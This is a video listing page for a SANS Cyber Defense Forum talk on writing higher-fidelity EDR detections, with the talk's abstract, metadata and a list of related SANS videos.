And Then There Were None (More False Positives): Writing Better EDR Detections | Cyber Defense Forum

Channel:
United States SANS Cyber Defense
Subscribers:
23,600
Published on ● Video Link: https://www.youtube.com/watch?v=3XHC3fD1PLE


Duration: 23:38
445 views
7

Is it possible for any security product to work properly out of the box? My experience is that a newly-deployed security tool will bury analysts in false positive alerts, leaving them with the task of either whitelisting them (which can leave the org open to false negatives), or tuning them for fidelity. Endpoint Detection Response (EDR) tools such as Carbon Black, Crowdstrike, and Symantec EDR are no exception. This problem is exacerbated in organizations with large populations of system admins and developers. Both these groups perform daily activities that trip alarms designed to find malicious activity. For example, encoded Powershell is often seen as an IOC, but system admins love it. I'll go over several cases, and demonstrate how to use parent processes, child processes, command-line options, and other techniques to raise the fidelity of your alerts.

Speaker: Dan Banker, Threat Response Team Lead, Motorola Solutions

View upcoming Summits: http://www.sans.org/u/DuS
Download the presentation slides (SANS account required) at http://www.sans.org/u/195g



Other Videos By SANS Cyber Defense


2021-01-24[Breakout #1] Better Alerts via Log Enrichment | All-Around Defenders
2021-01-24[Roundtable] Cyber Defense Predictions: What Are We Going To See in 2021? | All-Around Defenders
2021-01-24[Introduction] All-Around Defenders: New Year, New Start | A Community Gathering
2021-01-13All About OSINT: Looking Forward, Looking Back
2020-12-12Building the Better Playbook: Techniques to Improve Repeatability | SANS Cyber Defense Forum 2020
2020-12-11Ask Us (Almost) Anything About Cyber Defense | SANS Cyber Defense Forum 2020
2020-12-10Resource Smart Detection with YARA and osquery
2020-12-09Automating Threat Hunting on the Dark Web and other nitty-gritty things | SANS Cyber Defense Forum
2020-12-07Ransomware Defense and Response: Minimizing Risk of an Increasing Threat | SANS Cyber Defense Forum
2020-12-06Resolve Security Alerts with Adaptive Intelligence and Guided Response | SANS Cyber Defense Forum
2020-12-05And Then There Were None (More False Positives): Writing Better EDR Detections | Cyber Defense Forum
2020-12-03XDR - The Hidden Pitfalls of Evaluation and Deployment | SANS Cyber Defense Forum 2020
2020-12-01Metrics on Steroids: Improving SOC Maturity using the SOC-CMM | SANS Cyber Defense Forum 2020
2020-12-01Taking Your Detection Program to the Next Level | SANS Cyber Defense Forum 2020
2020-11-29Analysis 101 for Incident Responders | SANS Cyber Defense Forum 2020
2020-11-28Hiding in the clouds: How attackers can use applications for sustained persistence & how to find it
2020-11-27Asking Questions and Writing Effectively | SANS Cyber Defense Forum 2020
2020-11-25New Tools for your Threat Hunting Toolbox | SANS Cyber Defense Forum 2020
2020-11-16Full Packet Capturing with TShark for Continuous Monitoring & Threat Intel via IP, Domains, & URLS
2020-09-14PowerShell 2020: State of the Art / Hack / Infection
2020-07-30Social Engineering Your Way to Success | Justin Henderson & Ismael Valenzuela


Tags:
sans institute
sans cyber defense forum
cyber defense forum
Dan Banker
EDR
EDR detections
EDR detection
writing EDR detections
endpoint detection response
endpoint detection